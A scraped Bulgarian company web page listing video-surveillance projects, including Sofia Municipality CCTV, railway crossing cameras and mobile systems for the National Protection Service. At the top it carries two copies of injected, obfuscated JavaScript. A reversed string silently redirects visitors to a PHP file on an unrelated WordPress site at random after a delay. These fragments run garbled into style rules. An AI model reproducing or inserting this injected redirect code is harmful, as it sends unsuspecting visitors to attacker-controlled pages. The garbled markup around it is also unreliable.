Референции – Сигурност

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1512165635435{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 90px !important;padding-bottom: 90px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}“]

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1512165889155{margin-top: 20px !important;}“]

Столична община

Проект: Разширение на системата за видеонаблюдение на територията на гр. София, покриваща централни булеварди, кръстовища, публични площи, градски градини и подлези. Системата е базирана на 4 мегапикселови камери Sunell и система за запис и обработка NUUO Mainconsole и Crystal NVR.

Изтегли: Референция – Столична община – 21-11-2017

[vc_separator]

Столична община

Проект: Доставка, монтаж, пуск и поддръжка на система за видеонаблюдение на територията на гр. София, покриваща централни булеварди, кръстовища, публични площи, градски градини и подлези. Системата е базирана на мегапикселови камери Sunell, Vivotek и PTZ камери ACTi, комбинирани със система за запис и обработка NUUO Mainconsole и Crystal NVR.

Изтегли: Референция – Столична община – 30-03-2016

[vc_separator]

UNIFY София

Проект: Доставка, инсталация и пуск на система за видеонаблюдение в централният офис на компанията. Сървър за запис NUUO Crystal и IP мегапикселови камери ACTi, както и професионални слушалки Plantronics.

Изтегли: Референция – UNIFY

[vc_separator]

Добруждански Земеделски Институт

Проект: Доставка, монтаж, пуск и поддръжка на система за видеонаблюдение на територията на института. Изградена са IP камери Sunell и NUUO Mainconsole записващ сървър.

Изтегли: Референция – ДОБРУДЖАНСКИ ЗЕМЕДЕЛСКИ ИНСТИТУТ

[vc_separator]

Национална Компания Железопътна Инфраструктура (НКЖИ)

Проект: Доставка, монтаж и пуск на система за видеонаблюдение на избрани ЖП прелези с бежично решение за пренос на информация.

Изтегли: Референция – НКЖИ

[vc_separator]

Национална Служба за Охрана (НСО)

Проект: Доставка, монтаж, пуск и поддръжка на мобилни системи за видеонаблюдение за нуждите на службата.

Изтегли: Референция – НСО

[vc_separator]

ПАНДА-ИП ЕООД

Проект: Доставка, монтаж, пуск и поддръжка на система за видеонаблюдение в превозни средства на компанията. Системата е базирана на специализирани мобилни видеорекордери на EverFocus с предаване на видео в реално време през 4G мрежа.

Изтегли: Референция – Панда-ИП

[vc_separator]

Седна Палър Плантс България ЕООД

Проект: Доставка, монтаж и пуск на система за видеонаблюдение и периметрова охрана на територията на соларен парк гр. Сливен.

Изтегли: Референция – СЕДНА ПАЛЪР ПЛАНТС

[vc_separator]